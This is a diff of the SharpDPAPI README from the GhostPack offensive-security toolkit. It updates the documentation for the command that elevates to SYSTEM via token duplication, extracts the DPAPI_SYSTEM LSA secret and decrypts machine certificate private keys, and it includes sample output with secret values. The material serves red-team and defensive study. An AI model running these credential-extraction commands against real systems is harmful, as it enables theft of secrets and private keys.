GhostPack/SharpDPAPI/README.md

     ...(snip)...

-#### machinecerts
+#### certificates /machine

-The **machinecerts** command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys.
+The **certificates /machine** command will use the machine certificate store to look for decryptable machine certificate private keys. `/mkfile:X` and `{GUID}:masterkey` are usable with the `/target:\[file|folder\]` command, otherwise SharpDPAPI will elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys.
 These keys are then used to decrypt any found machine system encrypted DPAPI private certificate keys.

+By default, only private keys linkable to an associated installed certificate are displayed.
+The `/showall` command will display ALL decrypted private keys.

 Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).

-    C:\Temp>SharpDPAPI.exe machinecerts
+    C:\Temp>SharpDPAPI.exe certificates /machine

       __                 _   _       _ ___
      (_  |_   _. ._ ._  | \ |_) /\  |_) |
      __) | | (_| |  |_) |_/ |  /--\ |  _|_
                     |
-      v1.7.0
+      v1.10.0

-    [*] Action: Machine DPAPI Certificate Triage
+    [*] Action: Certificate Triage
     [*] Elevating to SYSTEM via token duplication for LSA secret retrieval [*] RevertToSelf()

     [*] Secret  : DPAPI_SYSTEM
     [*]    full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
     [*]    m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3

     [*] SYSTEM master key cache:

-    {3c1fb9fb-aabe-4c45-aab9-c3e1b614776d}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
-    ...(snip)...
+    {f12f57e1-dd41-4daa-88f1-37a64034c7e9}:3AEB121ECF2...(snip)...

     [*] Triaging System Certificates